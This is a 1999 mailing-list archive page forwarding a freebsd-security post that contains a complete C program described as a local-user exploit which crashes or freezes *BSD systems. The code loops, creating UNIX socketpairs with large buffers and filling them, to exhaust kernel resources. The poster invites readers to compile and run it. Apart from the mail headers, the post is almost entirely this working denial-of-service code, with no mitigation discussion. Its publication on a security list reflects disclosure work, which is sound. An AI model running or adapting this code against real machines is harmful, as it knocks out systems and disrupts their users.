(fwd) *bsd crashes/freezes/hangs on local user xploit

Andrey Gerzhov (kittle@freeland.alex-ua.com)
Sat, 11 Sep 1999 18:57:16 +0300 (EEST)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Andrey Gerzhov: "(fwd) Re: Xrus question"
Previous message: Andrey Gerzhov: "(fwd) Re: Tracing open ports on FreeBSD"

-- forwarded message --
Path: freeland.alex-ua.com!news.alexradio.kiev.ua!not-for-mail
Date: Fri, 10 Sep 1999 17:21:27 +0200 (CEST)
From: wdmgds <wdmgds@xs4all.nl>
To: freebsd-security@FreeBSD.ORG
Subject: *bsd crashes/freezes/hangs on local user xploit
Message-ID: <Pine.BSI.4.10.9909101717140.1525-100000@xs3.xs4all.nl>
Newsgroups: alex.gated.freebsd.security
Lines: 47
Xref: freeland.alex-ua.com alex.gated.freebsd.security:4541

Dear /etc

compile this code snipplet and wheep ...
it crashed and mutilated our 227 and 3x boxen..
BSDi4 just freezes a couple of seconds,

bye

--

#include	<unistd.h>
#include	<sys/socket.h>
#include	<fcntl.h>

#define		BUFFERSIZE	204800
/* kiddy var le surgery */
extern	int
main(void)
{
	int		p[2], i;
	char		crap[BUFFERSIZE];

	while (1)
	{
		if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
			break;
		i = BUFFERSIZE;
		setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
		setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
		setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
		setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
		fcntl(p[0], F_SETFL, O_NONBLOCK);
		fcntl(p[1], F_SETFL, O_NONBLOCK);
		write(p[0], crap, BUFFERSIZE);
		write(p[1], crap, BUFFERSIZE);
	}
	exit(0);
}




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
-- end of forwarded message --

-- 
С тем, что не помешает никогда,
                                               Kittle 





 Next message: Andrey Gerzhov: "(fwd) Re: Xrus question"
 Previous message: Andrey Gerzhov: "(fwd) Re: Tracing open ports on FreeBSD"